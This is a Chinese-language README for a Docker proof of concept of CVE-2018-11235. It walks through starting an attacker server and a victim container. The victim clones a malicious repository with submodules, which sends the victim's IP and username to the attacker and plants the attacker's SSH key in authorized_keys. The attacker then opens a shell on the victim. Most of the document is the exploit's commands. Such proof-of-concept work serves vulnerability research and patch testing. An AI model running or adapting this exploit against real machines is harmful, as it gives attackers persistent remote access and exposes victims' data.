要构建 Docker 容器,请使用:
make docker
(以下 make 命令应在您机器上的不同终端中并行运行)
要启动攻击者服务器的容器,请使用:
make run_server
要启动代表受害者的容器,请使用:
make run_client
该容器将运行 client.py 脚本。该脚本会将其 IP 地址和用户名发送给攻击者。
请按照客户端控制台中的说明来克隆恶意 git 仓库。
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned
您将看到受害者的 IP 地址和用户名已被传输到服务器。
克隆完成后,请确认攻击者的公钥已成功添加到客户端的 authorized_keys 中。
接下来,您可以从服务器端在客户端上打开一个 shell,使用以下命令(在您自己的机器上执行):
make server_bash
ssh <transmitted_username>@<transmitted_host>
如果您在执行此 Proof of Concept 时遇到任何问题,请在此仓库中创建一个 issue:https://github.com/ygouzerh/CVE-2018-11235/issues ,我们将尽快 回复。